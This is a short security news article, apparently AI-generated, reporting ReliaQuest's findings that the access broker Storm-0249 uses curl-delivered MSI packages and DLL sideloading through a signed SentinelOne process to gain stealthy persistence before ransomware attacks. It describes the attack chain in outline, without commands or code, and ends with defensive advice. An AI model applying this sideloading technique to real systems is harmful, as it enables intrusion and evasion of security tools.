Ethical Hacking News
Ransomware gangs have been exploiting endpoint detection and response (EDR) solutions to launch stealthy malware attacks. A recent case, attributed to Storm-0249, demonstrates how attackers are leveraging trusted EDR components to evade security tools and establish persistence on compromised systems. As a result, system administrators must prioritize behavior-based detection and implement stricter controls for suspicious activities to prevent future attacks.
Ransomware attacks are becoming increasingly sophisticated, with attackers using endpoint detection and response (EDR) solutions and trusted Microsoft Windows utilities to launch malware.The use of initial access brokers (IABs) allows attackers to bypass traditional monitoring methods and hide malicious activity from defenders.Social engineering campaigns trick users into executing malicious commands, which then download a malicious MSI package that installs a stealthy persistence mechanism.The attack uses legitimate processes to execute malicious code, making it challenging for security tools to detect the activity.Organizations must rely on behavior-based detection and implement stricter controls for suspicious activities like curl, PowerShell, and LoLBin execution.
Ransomware has long been a threat to computer systems and networks, but recent developments have highlighted the increasing sophistication of these attacks. According to a report from cybersecurity company ReliaQuest, an initial access broker (IAB) known as Storm-0249 has been abusing endpoint detection and response (EDR) solutions and trusted Microsoft Windows utilities to load malware, establish communication, and persistence in preparation for ransomware attacks.
This new tactic is particularly concerning because it allows the attackers to bypass traditional monitoring methods. By leveraging the power of EDR components, such as SentinelOne, Storm-0249 is able to hide malicious activity from defenders. This approach has proven effective and difficult for security teams to counter, even with well-documented threat intelligence.
The attack starts with a social engineering campaign that tricks users into executing curl commands in the Windows Run dialog to download a malicious MSI package with SYSTEM privileges. The MSI file then drops a malicious DLL (SentinelAgentCore.dll) alongside a legitimate SentinelAgentWorker.exe process. The attackers then load the DLL using the signed SentinelAgentWorker, executing the file within a trusted EDR process and obtaining stealthy persistence that survives operating system updates.
The use of legitimate processes to execute malicious code is a hallmark of advanced threats, making it challenging for security tools to detect the activity. According to ReliaQuest, once the attacker gains access, they can collect system identifiers through legitimate Windows utilities like reg.exe and findstr.exe, as well as funnel encrypted HTTPS command-and-control (C2) traffic.
This attack highlights the need for system administrators to rely on behavior-based detection that identifies trusted processes loading unsigned DLLs from non-standard paths. Furthermore, it is essential to set stricter controls for curl, PowerShell, and LoLBin execution to prevent similar attacks in the future.
The use of IABs like Storm-0249 underscores the importance of staying informed about emerging threats and adopting robust security measures to mitigate their impact. As the threat landscape continues to evolve, it will be crucial for organizations to stay vigilant and adapt their defenses accordingly.
Related Information:
https://www.ethicalhackingnews.com/articles/Ransomware-IAB-Abuses-EDR-for-Stealthy-Malware-Execution-A-Growing-Concern-ehn.shtml
https://www.bleepingcomputer.com/news/security/ransomware-iab-abuses-edr-for-stealthy-malware-execution/
Published: Tue Dec 9 09:27:57 2025 by llama3.2 3B Q4_K_M
